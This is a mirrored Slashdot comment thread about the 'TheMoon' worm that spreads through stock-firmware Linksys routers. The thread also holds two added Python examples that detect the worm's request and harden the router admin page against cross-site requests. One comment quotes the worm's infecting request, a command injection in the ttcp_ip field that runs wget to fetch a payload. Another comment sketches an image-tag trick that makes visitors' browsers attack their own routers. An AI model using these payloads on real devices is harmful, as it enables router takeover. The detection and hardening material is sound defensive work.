Slashdot Mirror


Linksys Routers Exploited By "TheMoon"

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

134 comments

  1. That's impossible by CajunArson · · Score: 5, Funny

    Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.

    This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.

    Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!

    In conclusion, Windows is the cause of all security problems.

    --
    AntiFA: An abbreviation for Anti First Amendment.
    1. Re:That's impossible by Anonymous Coward · · Score: 1

      Times like this, I wish I had mod points. That was amazing.

    2. Re:That's impossible by Anonymous Coward · · Score: 0

      OMG! now every linux device on earth will be compromised... run for the hills!!!

    3. Re:That's impossible by Zantac69 · · Score: 1

      Search your feelings, you know it to be true.

      --
      1331461 is only semiprime *sigh* Alas - I am just short of 1337.
    4. Re: That's impossible by Anonymous Coward · · Score: 5, Informative

      Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.

    5. Re:That's impossible by Narcocide · · Score: 5, Informative

      Only affecting models not running Linux currently...

    6. Re:That's impossible by Anonymous Coward · · Score: 2, Funny

      Also, Linksys is owned by Cisco. Cisco makes IOS for their routers. iOS is on iPhones. iPhones have never had a worm like this.

      Ipso facto, this is unpossible

    7. Re:That's impossible by Anonymous Coward · · Score: 0

      OMG! now every iphone on earth will be compromised... run for the hills!!!

    8. Re:That's impossible by Anonymous Coward · · Score: 0

      Shh! Stop using facts, they only cloud your emotions!

    9. Re:That's impossible by gnick · · Score: 2

      I tried to turn mine off, but it bit me! I tried throwing Androids at it, but zombies started flowing out of the Apple store to defend it!

      --
      He's getting rather old, but he's a good mouse.
    10. Re:That's impossible by X0563511 · · Score: 3, Insightful

      Last I checked vxworks is not linux...

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    11. Re:That's impossible by bobstreo · · Score: 1

      Actually, linksys has been owned by Belkin for over a year:

      http://www.bloomberg.com/news/...

    12. Re:That's impossible by Anonymous Coward · · Score: 0

      IOS is also the subset of AIX used to run the virtual I/O servers on POWER6 and newer. So, by this logic, I have to drop all my LPARs and demand POWER8 replacements once IBM ships those.

      Or, I could just have one LPAR, and slice it up with WPARs...

    13. Re:That's impossible by operagost · · Score: 1

      Join me, and we will h4x the galaxy as router and LAN.

      --

      Gamingmuseum.com: Give your 3D accelerator a rest.
    14. Re:That's impossible by Anonymous Coward · · Score: 0

      OMG! now every linux device on earth will be compromised... run for the hills!!!

      And thus begins [glasses] the Fear of the Linux desktop.

    15. Re:That's impossible by operagost · · Score: 1

      You are incorrect. It's my new open-source OS, VXINLX (aka VX is not linux) that is, of course, not Linux.

      How to pronounce VXINLX is left as an exercise for the reader.

      --

      Gamingmuseum.com: Give your 3D accelerator a rest.
    16. Re:That's impossible by BronsCon · · Score: 1

      What about WOPR?

      --
      APK quotes people (including myself) without context and should not be trusted. Just thought you should know.
    17. Re:That's impossible by Anonymous Coward · · Score: 0

      Cite?

    18. Re:That's impossible by FuegoFuerte · · Score: 3, Informative

      As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

      I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?

      Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.

    19. Re:That's impossible by Anonymous Coward · · Score: 0

      WOPR was temporarily infected by the "Thermonuclear War" virus.
      Fortunately WOPR was replaced decades ago by Colossus and its later SkyNet upgrade.

    20. Re:That's impossible by Anonymous Coward · · Score: 0

      You forgot the NSA factor....

    21. Re:That's impossible by BronsCon · · Score: 1

      Last I checked, Skynet wasn't yet operational.

      --
      APK quotes people (including myself) without context and should not be trusted. Just thought you should know.
    22. Re:That's impossible by Anonymous Coward · · Score: 0

      Marry me!

    23. Re:That's impossible by silviuc · · Score: 1

      Those mentioned in the posting run vxworks not linux. Troll better next time.

    24. Re: That's impossible by Mashiki · · Score: 2

      Odd, I run tomato. Which is also 'nix, so saying that ddwrt is the only way for sure isn't true.

      --
      Om, nomnomnom...
    25. Re:That's impossible by Anonymous Coward · · Score: 0

      *groan* that was awful.

      Good, but awful.

    26. Re:That's impossible by Anonymous Coward · · Score: 0

      Pretty funny, but a sign of sad times. When hiking I always carry a bag and pick up plastic tossed by others. This is the philosophy of open source. We do not need license agreements to tell us that.

      Sorry, the people who consider themselves geeks today have lost their integrity. They monetize the bugs as hacks or privacy violations.

    27. Re: That's impossible by tech.kyle · · Score: 2

      I believe you're picking nits slightly. Regardless, you're totally right and the above AC is technically wrong. There are a good number of alternative router OSes available, many of which run *nix.

      --
      If we colonize Mars, it won't be the World Wide Web anymore. UWW?
    28. Re:That's impossible by tech.kyle · · Score: 2

      Just because some of their routers run *nix doesn't mean the software Linksys put on it is flawless. Doesn't matter what it's running if their grubby little hands were all over it.

      --
      If we colonize Mars, it won't be the World Wide Web anymore. UWW?
    29. Re:That's impossible by tech.kyle · · Score: 1

      Something something rotten Apple. *rimshot*

      --
      If we colonize Mars, it won't be the World Wide Web anymore. UWW?
    30. Re: That's impossible by Anonymous Coward · · Score: 0

      LOL, you took the words out of my mouth

    31. Re: That's impossible by Anonymous Coward · · Score: 0

      He's saying moreso that the only surefire way to have a storebought linux linksys router is to purchase one of the pre-flashed ddwrt ones.

    32. Re:That's impossible by Technician · · Score: 1

      Is this a case of default password, instead of a "Linux" vulnerability?

      --
      The truth shall set you free!
    33. Re:That's impossible by Anonymous Coward · · Score: 0

      I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

      Try a router/modem that doesn't allow you to turn off the wireless AP. And it has multiple APs, at least one that cannot be configured, and is a public access point.

    34. Re:That's impossible by JamieIanMacgregor · · Score: 1

      apply hacksaw to antenna

    35. Re:That's impossible by FuegoFuerte · · Score: 1

      Forget hacksaw, apply your favorite exploding target and a high power rifle. I guarantee it will be wireless, and no one will be accessing it anymore.

    36. Re:That's impossible by Elbart · · Score: 1

      This drivel gets 3 points? /. is really dead.

  2. poorly configured... by crutchy · · Score: 1

    ...web server

  3. 56k Connections are still less safe by BisuDagger · · Score: 2

    I heard if you have a 56k connection that the NSA can listen to your internet.

    1. Re:56k Connections are still less safe by crutchy · · Score: 1

      just don't verbally abuse your router because the FBI will bust down your door and drag you off to gitmo

  4. Network company supplied routers vul'n by RichMan · · Score: 4, Insightful

    Use this supplied router. Do NOT modify it.

    But it has admin/admin as user name and password and is 192.168.1.1
    Can I fix that?

    Do NOT modify the settings on the supplied router.

    *facepalm*

    1. Re:Network company supplied routers vul'n by SJHillman · · Score: 2

      My ex-girlfriend's parents had a wireless router like that... both the wireless and web interface had default settings that they weren't supposed to change. And it gets better. Administration from the WAN side was enabled (supposedly for support). Yes, with the default UN/PW. Only Frontier could make TWC look somewhat competent.

    2. Re:Network company supplied routers vul'n by Anonymous Coward · · Score: 0

      That is why I have 3 routers nested on my network. 1 is supplied by the cable company. 2 is for guests, smartphones and what either may want to access and 3 is for my family's computers and all printers but one.

    3. Re:Network company supplied routers vul'n by Anonymous Coward · · Score: 0

      Frontier did that? I use Frontier FiOS and I have never used their shitbox freebie router. In fact, I've even managed to get tech support to work with me for ONT issues with an OpenBSD box sitting on the Ethernet port of the ONT, and got that replaced without them insisting I use their router or plug directly into a Windows box (shudder).

    4. Re:Network company supplied routers vul'n by Mashdar · · Score: 1

      Is "network company" an ISP?

    5. Re: Network company supplied routers vul'n by Selivanow · · Score: 1

      Frontier has become better about not requiring a windows box. I'm pretty sure this is directly related to having "smarter" routers as opposed to just a "dumb" modem.

      Maybe they started hiring smarter helpdesk techs again. I swear it all went downhill after I stopped working there (did I just admit to that?).

      I remember helping walk customers through their dialup connection issues while beating my hi-score on Galaga.

      --
      -- ...trying to make digital files uncopyable is like trying to make water not wet. -Bruce Schneier
  5. Model Numbers of affected devices. by Anonymous Coward · · Score: 5, Informative

    Here is a list of router models mentioned in the binary:
    E4200
    E3200
    E3000
    E2500
    E2100L
    E2000
    E1550
    E1500
    E1200
    E1000
    E900

    1. Re:Model Numbers of affected devices. by mmell · · Score: 1
      I couldn't determine (maybe I read too fast, missed it) . . . is this an exploit against those models as shipped, or is this an exploit against Linksys routers which have been flashed to run a more current version of DD-WRT? I suspect the former, but I can't confirm that.

      If it's the former, then a software fix (flash to latest DD-WRT) is already available for those technically competent to implement it. If the latter . . . oi vey.

    2. Re:Model Numbers of affected devices. by Anonymous Coward · · Score: 0

      *sigh* I own one of those. Someone want to explain like I'm five on how to deal with this?

      If it is "go buy a new router", I'll go do that tomorrow. Any you recommend? I bought Linksys because my previous Belkin was faulty. It seems like everything Belkin touches is faulty. So no Linksys, and no Belkin. Is Netgear still pretty good anymore?

      I found open wrt website, but had no idea what I was supposed to do there.

    3. Re:Model Numbers of affected devices. by Anonymous Coward · · Score: 0

      I have an E3000.

      According to Dr J: "The worm only scans port 80 and 8080 (http and https). Changing the port will prevent this attack. Restricting access to the admin interface by IP address will help as well. "
      Also, replacing the stock firmware with DD-WRT would remove this vulnerability.

      https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Summary+What+we+know+so+far/17633

  6. Somebody had to do it by SuperKendall · · Score: 1, Funny

    Well I'm checking my router now and I don't see any is*#&$*#%(*#$# CARRIER MOONED

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
    1. Re:Somebody had to do it by WillAffleckUW · · Score: 1

      Mine says "CHA1RF4CE CHIPENDALE"

      Guess it's safe.

      --
      -- Tigger warning: This post may contain tiggers! --
    2. Re:Somebody had to do it by ArsonSmith · · Score: 1

      Hmm, Mine only says CHA

      guess it got interrupted by the next tick prior to completion.

      --
      Paying taxes to buy civilization is like paying a hooker to buy love.
    3. Re:Somebody had to do it by Virtucon · · Score: 1

      LOL I loved "The Tick"

      --
      Harrison's Postulate - "For every action there is an equal and opposite criticism"
  7. Is dd-wrt affected? by satuon · · Score: 2

    I have a Linksys router with dd-wrt, would it be affected?

    1. Re:Is dd-wrt affected? by Anonymous Coward · · Score: 0

      I'm afraid your router is already dead.

    2. Re:Is dd-wrt affected? by CreamyG31337 · · Score: 4, Informative

      no, it's just the default firmware.
      "Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
      from the comments on https://isc.sans.edu/forums/di...

  8. Default firmware only? by allcoolnameswheretak · · Score: 2

    Does this also apply to LinkSys Routers that have been Tomatoed?

    1. Re:Default firmware only? by SJHillman · · Score: 3, Funny

      No, but it does affect routers that have smiley face stickers applied to the top or sides.

    2. Re:Default firmware only? by Lothsahn · · Score: 4, Informative

      I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

      The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1

      It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

      --
      -=Lothsahn=-
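
A detection check for the request described in the comment above, where a shell command rides in the `ttcp_ip` form field. This is an added example, not part of the thread or of any vendor or ISC code; the tab-separated log layout, the `/PLACEHOLDER.cgi` path (the page does not name the URL), the sample addresses and the function names are all constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Field named in the comment above. The request path is not given on the page,
# so this check is path-agnostic and looks only at the form parameters.
FIELD = "ttcp_ip"

# Characters a shell treats specially, plus whitespace: none belong in an address.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\s]")
# Assumed shape of a legitimate value: an IP address or hostname, not starting with "-".
PLAIN_HOST = re.compile(r"^(?!-)[A-Za-z0-9.:-]{1,253}$")


def inspect_body(body):
    """Return reason codes if the ttcp_ip field of a form body looks like injection."""
    found = []
    for value in parse_qs(body, keep_blank_values=True).get(FIELD, []):
        hits = []
        if value.startswith("-"):
            hits.append("option-prefix")   # like the "-h" in the request quoted above
        if SHELL_META.search(value):
            hits.append("shell-meta")      # backticks, ;, |, $, whitespace ...
        if value and not hits and not PLAIN_HOST.match(value):
            hits.append("not-a-host")      # anything else that is not an address
        found.extend(h for h in hits if h not in found)
    return found


# Constructed sample records: source, method, path, URL-encoded form body.
SAMPLE_LOG = (
    "192.168.1.23\tPOST\t/PLACEHOLDER.cgi\t"
    "submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2"
    "&ttcp_ip=192.168.1.10&StartEPI=1\n"
    "198.51.100.7\tPOST\t/PLACEHOLDER.cgi\t"
    "submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2"
    "&ttcp_size=2&ttcp_ip=-h+%60echo+constructed%60&StartEPI=1\n"
    "203.0.113.9\tGET\t/index.html\t\n"
)


def scan(log_text):
    """Return (source, path, reasons) for every record whose body is suspicious."""
    alerts = []
    for line in log_text.splitlines():
        parts = line.split("\t")
        if len(parts) != 4:
            continue                       # skip records that do not fit the layout
        src, _method, path, body = parts
        reasons = inspect_body(body)
        if reasons:
            alerts.append((src, path, reasons))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The same allow-list idea applies on the device side: a field that should hold an address is validated against an address pattern before it goes anywhere near a shell.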
  9. According to TFA by Anonymous Coward · · Score: 0

    It may be related to these exploits...

  10. Aren't you by geekoid · · Score: 0

    supposed to be boycotting?

    --
    The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  11. Actually Belkin bought them from Cisco by fullmetal55 · · Score: 4, Informative

    Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

    and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

    1. Re:Actually Belkin bought them from Cisco by operagost · · Score: 1

      As I stuffed DD-WRT onto my Netgear router the other day in the hope I wouldn't have to keep rebooting it, I wondered when someone would come up with this sad feature. I didn't have to wait long for my answer.

      I miss my Motorolas that would never need to be rebooted. Alas, 802.11g wasn't cutting it anymore.

      --

      Gamingmuseum.com: Give your 3D accelerator a rest.
    2. Re:Actually Belkin bought them from Cisco by DigiShaman · · Score: 2

      "I can't get online. Is the internet down again?"

      "Did you forget to reboot the router - again?!"

      Have no fear. Belkin is here! With this new firmware reboots are scheduled automatically! ***applause***
      Now the entire family is happy again.

      --
      Life is not for the lazy.
    3. Re:Actually Belkin bought them from Cisco by amicusNYCL · · Score: 1

      Belkin purchased Linksys from Cisco last year.

      Man, I don't think I was aware of that. So now I have to add Linksys to my list of brands to never purchase? This is getting too confusing.

      --
      "Our two-party system is like a bowl of shit looking at itself in a mirror." - Lewis Black
    4. Re:Actually Belkin bought them from Cisco by Mashdar · · Score: 1

      I ran a Buffalo WHR-G125 with DD-WRT without restarting it for years. There were times when I was on vacation with it unplugged, so I'm not sure what the maximum continuous uptime was, but I never once had an issue which required a restart.
      Conclusion? Read reviews before you buy a router and see if people talk about having to restart it. They don't all need it. It's absurd that Linksys routers have been so bad for so long...

    5. Re: Actually Belkin bought them from Cisco by Anonymous Coward · · Score: 0

      What a stupid work around - instead of fixing the problems in the first place they just reboot the router periodically? stupid stupid stupid...

    6. Re: Actually Belkin bought them from Cisco by DigiShaman · · Score: 1

      Who knows. It could have been to address a class action lawsuit on a near EOLed product. Sour the milk and all that. The "solution" is to repla...er...upgrade the device.

      That, or the original dev was forced to focus further development and support on newer products.

      --
      Life is not for the lazy.
    7. Re: Actually Belkin bought them from Cisco by tragedy · · Score: 2

      Think it's stupid in routers? Patriot missile systems used to have a timing bug that would reduce accuracy the longer the unit was in operation. The bug was that the time in seconds since initialization was being converted from an int to a float and divided by 10, causing precision to go down as the time value went up. The inaccuracy was pronounced after 8 hours of continuous operation and the workaround was to restart the unit frequently (actually, it was apparently to assume that the units would be restarted frequently). As a result a unit that had been operating for 100+ hours failed to track an incoming scud missile and there were 126 US Army casualties (28 fatalities). That's the kind of software bug you can get worked up about! It is worth noting that they did actually patch it, and the patch was actually available before that incident, but had not yet been applied to that particular unit.

    8. Re: Actually Belkin bought them from Cisco by JamieIanMacgregor · · Score: 1

      isn't it the same fix for windows server?

    9. Re:Actually Belkin bought them from Cisco by Anonymous Coward · · Score: 0

      Netgear WNR3500L/U/v2 here, currently 668 day uptime. That's exactly how long it's been since I bought it and slapped Tomato on it. It replaced a Belkin that had to be rebooted more and more frequently (daily, at the end), and then just died.

    10. Re:Actually Belkin bought them from Cisco by GNious · · Score: 1

      From experience, Belkin also has a nice feature whereby wifi stops working after a certain amount of data has been transferred over it, requiring you to have a scheduled reboot setup for at least once a week.

  12. Your routers are now ours, by way of our actions. by RevWaldo · · Score: 1

    On the Moon, nerds get their pants pulled down and they are spanked with Moon rocks.

    .

  13. It wasn't Trolling by Anonymous Coward · · Score: 5, Insightful

    Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeing the source!"

    The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.

    Also, I took the GP's comment as a little teasing at the expense of some of the rapid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.

    I thought it was quite clever on a multitude of levels while expressing in very simple sentences.

  14. Comments below linked article. by Anonymous Coward · · Score: 0

    That's where I got the list from for affected devices. Some other guy mentioned that the exploit used was in the WRT54G's (*gulp*) code.

  15. Dodged that bullet by Mike+Van+Pelt · · Score: 2

    I'm sure glad I installed DDWRT on my E3000 about a year ago.

  16. So what can be done? by Anonymous Coward · · Score: 0

    The linked article is not very clear... is this a bug in the remote management code, or something else? If you have disabled remote management, is your router still vulnerable? What are some of the symptoms of infection?

    Any comments welcome...

    1. Re:So what can be done? by the_skywise · · Score: 1

      Disabling Remote management will help but not fully solve the problem.

      For instance a cross-scripting attack via your web browser could attempt to inject the worm on your side.

      My problem is I've got two... no three.. relatives/families scattered all over the US who are running an E4200, an E3000 and a WRT54G who all happily run amok letting javascript run higgeldy-piggledy because to block it messes up their web browsing experience. :(

      "Higgeldy-piggledy means a real mess!"

  17. TheMoon by confused+one · · Score: 5, Funny

    Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.

  18. Why is the admin port open to the public? by EMG+at+MU · · Score: 5, Insightful

    The web administration port should not be open to the public internet by default on these routers.

    1. Re:Why is the admin port open to the public? by Anonymous Coward · · Score: 1

      The web administration port should not be open to the public internet by default on these routers.

      If you can access it from your browser on the LAN, it is open to the public. Your browser accepts lists of URLs to load from any page you visit. Those URLs can trigger the flaw.

      XSS + CSRF breaks the Intranet/Internet barrier. It is safer to assume such a barrier does not exist. Your router should be secure from malicious traffic on any interface.

    2. Re:Why is the admin port open to the public? by TheRealMindChild · · Score: 1

      What? My E4200 immediately refuses connection on the WAN side if administration is disabled on such. What am I missing?

      --

      "When life gives you lemons, don't make lemonade. Make life take the lemons back!" -- Cave Johnson
    3. Re:Why is the admin port open to the public? by Anonymous Coward · · Score: 1

      Read the parent post more closely. Your browser visits a malicious site (or a legit site with a malicious link/image in a combox), which causes the browser to hit the router's LAN side.

    4. Re:Why is the admin port open to the public? by TheRealMindChild · · Score: 1

      Thanks

      --

      "When life gives you lemons, don't make lemonade. Make life take the lemons back!" -- Cave Johnson
    5. Re:Why is the admin port open to the public? by Anonymous Coward · · Score: 0

      The web administration port should not be open to the public internet by default on these routers.

      That infected Windows machine effectively renders your firewall useless. Welcome to the real world. Worms making tunnels.... who would have thought?

      Router manufacturers have been selling bullshit for years now. They think that everything on the NAT side is trustworthy. It's fucking lunacy. Router manufacturers should design their admin interfaces with the same level of care and scrutiny that a public facing internet site gets. One infected box on the "safe" side of your firewall makes your firewall nonexistent. End of story. It will happen. Count on it.

      Your firewall is mostly useless these days. Crawl out from under your rock and realize that most of today's internet traffic is bot generated.
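
The comments in this thread describe a browser on the LAN being made to send requests to the router's admin interface on behalf of another site. The checks below are what an admin interface can apply to refuse such requests; this is an added example, not part of the thread or of any vendor firmware, and `ALLOWED_HOSTS`, the token handling and the function names are hypothetical.

```python
import hmac
from urllib.parse import urlsplit

# Assumption: names and addresses under which the admin UI is legitimately reached.
ALLOWED_HOSTS = {"192.168.1.1", "router.example"}
SAFE_METHODS = {"GET", "HEAD"}   # these must never change state in the admin UI


def _hostname(value, bare=False):
    """Lower-cased host of a URL, or of a bare Host header when bare=True."""
    try:
        return (urlsplit("//" + value if bare else value).hostname or "").lower()
    except ValueError:
        return ""


def check_admin_request(method, headers, session_token, form_token=None):
    """Decide whether a request to the admin UI may proceed: (allowed, reason)."""
    # 1. The Host header must be a name we actually serve. This stops a page on
    #    another domain that resolves to the router's address (DNS rebinding).
    host = _hostname(headers.get("Host", ""), bare=True)
    if host not in ALLOWED_HOSTS:
        return False, "unexpected Host header"

    # 2. If the browser says where the request came from, it must be our own UI.
    #    An <img> or form on another site carries that site's Origin or Referer.
    #    Only host names are compared here; ports are ignored for brevity.
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value and _hostname(value) != host:
            return False, "cross-site " + name

    # 3. Anything that changes state needs proof it came from a page we rendered:
    #    a provenance header plus the per-session token embedded in our forms.
    if method.upper() not in SAFE_METHODS:
        if not (headers.get("Origin") or headers.get("Referer")):
            return False, "state change without Origin or Referer"
        if not form_token or not hmac.compare_digest(form_token, session_token):
            return False, "missing or wrong anti-CSRF token"
    return True, "ok"


if __name__ == "__main__":
    # Constructed requests: one from the router's own UI, one embedded in another site.
    own = {"Host": "192.168.1.1", "Origin": "http://192.168.1.1"}
    foreign = {"Host": "192.168.1.1", "Referer": "http://other-site.example/page.html"}
    print(check_admin_request("POST", own, "tok123", "tok123"))
    print(check_admin_request("GET", foreign, "tok123"))
```

A GET with no Referer still passes step 2, which is why the safe methods must have no side effects and every configuration action must sit behind step 3.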

  19. how can i tell if my router is affected? by schlachter · · Score: 1

    I have a WRT54 running the original linksys software.
    I know you guys will say to push DDWRT onto it.
    In any case, how can i tell if my router's been compromised?
    It has been flakey lately but I figured that was just signal interference.

    --
    My God can beat up your God. Just kidding...don't take offense. I know there's no God.
    1. Re:how can i tell if my router is affected? by Anonymous Coward · · Score: 3, Funny

      There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

    2. Re:how can i tell if my router is affected? by sleekware · · Score: 1

      I have a WRT54 running the original linksys software. I know you guys will say to push DDWRT onto it. In any case, how can i tell if my router's been compromised? It has been flakey lately but I figured that was just signal interference.

      Also running original firmware, with a newer Linksys. Short of doing the most reasonable thing and swapping out my firmware for third party, I'm thinking of upgrading to the latest manufacturer's firmware and then treating the router's IP as an untrusted site in my browser, adding an exception only when I need to make a change. Perhaps this would thwart? Also not using the default IP, didn't see it mentioned if that would matter...

    3. Re:how can i tell if my router is affected? by IDtheTarget · · Score: 1

      There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

      Damn, the first time I can remember when I *actually* laughed out loud at a Slashdot post, and I'm without MOD points!

  20. Nah, don't think so, sorry by Anonymous Coward · · Score: 0

    You: Hello
    You: A presales question
    Cherry Chris S. R: Hello ******.
    You: I can call you Chris
    Cherry Chris S. R: Sure.
    You: E4200
    E3200
    E3000
    E2500
    You: just curious, can you tell from top of your head, if any of those models run some Linux distro on it by default factory settings?
    You: or they use some custom made Lynksys firmware?
    Cherry Chris S. R: Do you mean if these routers work with Linux?
    You: no, what is installed by default
    Cherry Chris S. R: Linksys routers have there own firmware.
    You: can't seem to find it in FAQ
    You: ok, so those ones are custom Lynksys?
    Cherry Chris S. R: Yes.

  21. pronunciation by dkman · · Score: 3, Insightful

    Vixin Licks? just sayin'

    --
    I refuse to sign
  22. One of these days, Alice! by Anonymous Coward · · Score: 0

    One of these days, Alice!

    POW!

    ZOOM!

    To the moon!

    1. Re:One of these days, Alice! by sideslash · · Score: 1

      Sigh... at least quote it right. From Wikipedia:

      "One of these days... POW!!! Right in the kisser!" or "BANG, ZOOM! Straight to the moon!", to which she usually replies, "Ahhh, shut up!"

  23. Don't Encourage Them! by Anonymous Coward · · Score: 0

    no, it's just the default firmware. "Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue." from the comments on https://isc.sans.edu/forums/di...

    Hee hee, you knew that because you bothered to click on the article. Good!

    You comforted the lazy douchebaggery of another who couldn't be bothered. Bad!

    1. Re:Don't Encourage Them! by Anonymous Coward · · Score: 0

      Or you could say since CreamyG31337 had already searched the relevant information they did not force someone else to redo their work. Information wants to be free, they're just helping it escape :)

  24. You got the correct message by CajunArson · · Score: 2

    I'm glad you got the satire... I've been running Linux on any machine under my direct control since 2000 and I did my Master's thesis by hacking on a Linux Security Module for domain & type enforcement back when the 2.6 Kernel was still in beta... so I'm not exactly shilling for Microsoft.

    I'm also not a fan of complacency. While I really like that a whole lot of devices run Linux, if they can't be updated to address security issues in a very easy (even completely automated) manner, then Linux can be just as vulnerable as Windows or anything else.

    --
    AntiFA: An abbreviation for Anti First Amendment.
    1. Re:You got the correct message by SQLGuru · · Score: 2

      Yay for common sense (both you and Anonymous above). I run Windows....I have nothing against Linux, but working in Windows pays the bills. I patch regularly, I browse intelligently....and I haven't had a virus on *MY* machine since the Ping-Pong virus back in the DOS days.........(that was a cool virus, BTW).

      Open Source isn't a cure-all. Neither is Closed Source. User behavior and knowledge is the best cure-all.

    2. Re:You got the correct message by JamieIanMacgregor · · Score: 1

      These DOS anecdotes I enjoy so I'll add one of my own...I used to run windows (never used AV) but not any more, not due to security but just prefer linux... the last virus I can remember getting was 'stoned' - that one was just weird - pre win3. oh yeah, did have some outlook vbs thing at work once and replaced hundreds of bios chips after chernobyl and chased some worm around a school but never had them myself.

  25. Re:Your routers are now ours, by way of our action by iluvcapra · · Score: 1

    That's no moon...

    --
    Don't blame me, I voted for Baltar.
  26. Wrong Icon. by Anonymous Coward · · Score: 0

    Your icon is a caterpillar, not a worm. Just sayin'.

  27. TheMoon? We like the moon! by 93+Escort+Wagon · · Score: 1

    Can't... help.... myself...

    http://www.youtube.com/watch?v...

    --
    #DeleteChrome
  28. belkin by Anonymous Coward · · Score: 0

    friends don't let friends buy belkin.

  29. Agreed on Buffalo by default+luser · · Score: 1

    My HighPower N300 Gigabit DD-WRT has been completely stable to the point that I forget it's there. And if it wasn't, as the name implies I could fix any issues by upgrading to DD-WRT (this is a supported and warrantied mode).

    This has been a fantastic experience, and it just makes me wonder why people persist in buying Linksys just for their name. Everyone has known for years that they are utter shit, but they keep buying the things!

    --

    Man is the animal that laughs.
    And occasionally whores for Karma.

  30. hp firmware by Anonymous Coward · · Score: 0

    This is why HP'S DECISION to charge for firmware updates is ridiculous! They are charging people for their own mistakes.

  31. Re:Your routers are now ours, by way of our action by Anonymous Coward · · Score: 0

    it's a space station!

  32. mark calendar for firmware update, borrow junk unt by raymorris · · Score: 1

    Getting a Netgear WND3700 would solve the problem. That particular model is one I'm happy with, but there are plenty of perfectly fine routers around.

    Linksys will probably put out an update that fixes the problem. You could mark your calendar for 30 days from now and Google search "update Linksys firmware" to find illustrated instructions showing what buttons to press to do the update.

    If you wish, you could use an old, cheap router while waiting for the update. Your friendly neighborhood geek probably has a few spares piled in a box somewhere.

  33. img src=http://local/hack.cgi by raymorris · · Score: 1

    If you know any html, the subject line answers the question. If you don't, you might just have to trust that if I put something like the above in my web page, it causes visitors to hack their own router for me.

    1. Re:img src=http://local/hack.cgi by Anonymous Coward · · Score: 0
  34. Re:mark calendar for firmware update, borrow junk by Anonymous Coward · · Score: 0
  35. Difference by Anonymous Coward · · Score: 0

    closed source can install holes, and no one in the wild becomes aware of it.

    open-source is there for people to see, and can be exploited because of that.

    And it seems the "anarchy" hackers go for the monopolies like MS and Apple, attack government sites, anything that one *could* call the "establishment" while "white collar" hackers go after anything that can make them a buck.
    I would also point out that governments around the world and their spying agencies may also be openly targeting Linux to exploit, maybe in some campaign to expose Linux and get people to stick with closed source software.

    Closed source can track and keep records of everything you are or have done. Windows and XP's "hidden files", which are obviously buried deep within the system, reportedly record and save everything you do: internet, notepad/wordpad, software installed, hardware, etc. I have seen a listing of these files but haven't bothered to print them out or try to explore what they contain.

    I'm not sure if Linux is built to do the same! But I would agree no solution seems to be a sure thing.

  36. The Corruption of The Idea and the support behind by Anonymous Coward · · Score: 0

